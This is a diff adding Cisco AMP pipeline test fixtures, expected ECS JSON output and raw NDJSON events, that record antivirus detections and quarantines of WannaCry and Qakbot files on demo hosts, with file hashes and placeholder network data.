"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843795681Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064600", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843806383Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064599", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 6404, + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": 
"2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843808566Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064597", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { 
+ "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843810485Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064596", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log new file mode 100644 index 00000000000..dc134052124 --- /dev/null 
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log 
@@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
